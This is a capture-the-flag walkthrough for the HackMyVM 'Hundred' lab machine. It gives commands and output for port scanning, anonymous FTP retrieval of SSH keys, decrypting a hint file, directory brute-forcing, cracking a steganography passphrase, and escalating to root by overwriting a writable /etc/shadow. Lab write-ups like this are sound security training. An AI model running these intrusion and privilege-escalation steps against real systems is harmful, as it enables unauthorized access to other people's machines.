HackMyVm Hundred Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
 |_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 1
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
 |   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
 |_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Login in ftp anonymous, download all 4 files and check each one.

id_rsa is a fake key. users.txt has a name list. id_rsa.pem looks like a good rsa key.

Scan port 80, only found index.html. Check source code, there is a hint: key. And there may be a secret dir.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->

Download h4ckb1tu5.enc. Google the way to decrypt enc file. Get the dir name.

```bash
 ~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin  
 ~ cat key.bin
 /softyhackb4el7dshelldredd

Scan the dir with common.txt, get id_rsa.

 ~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50  -w /usr/share/dirb/wordlists/common.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /id_rsa               (Status: 200) [Size: 1876]
 /index.html           (Status: 200) [Size: 26]  
 /index.html           (Status: 200) [Size: 26]

Try to login ssh with the username in users.txt downloaded from ftp, in fact, the really username is hvm. But we still need the pass of the key file.

 ~ ssh noname@192.168.56.100 -i id_rsa    
 noname@192.168.56.100's password:

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':

At root folder, we can get a logo.jpg, let's see if something is hidden in it.

 ~ stegseek --crack logo.jpg users.txt
 StegSeek version 0.5
 Progress: 0.00% (0 bytes)          

 [i] --> Found passphrase: "cromiphi"
 [i] Original filename: "toyou.txt"
 [i] Extracting to "logo.jpg.out"

 ~ cat logo.jpg.out                                                                                      
 d4t4s3c#1

Now we can login ssh as hmv.

 ~ ssh hmv@192.168.56.100 -i id_rsa                                                                                                                                                             ssh-0 | 130 [19:12:34]
 Enter passphrase for key 'id_rsa':
 Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
 hmv@hundred:~$ id
 uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found /etc/shadow is writable.

hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /var/www/html/softyhackb4el7dshelldredd/id_rsa
 /etc/shadow
 ...

Create a password hash with word "mypass", and overwrite /etc/shadow. Then we can be root.

 hmv@hundred:/$ openssl passwd mypass
 J9ZxI.ncuCgxs
 hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
 hmv@hundred:/$ su root
 Password:
 root@hundred:/# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hundred
 root@hundred:/#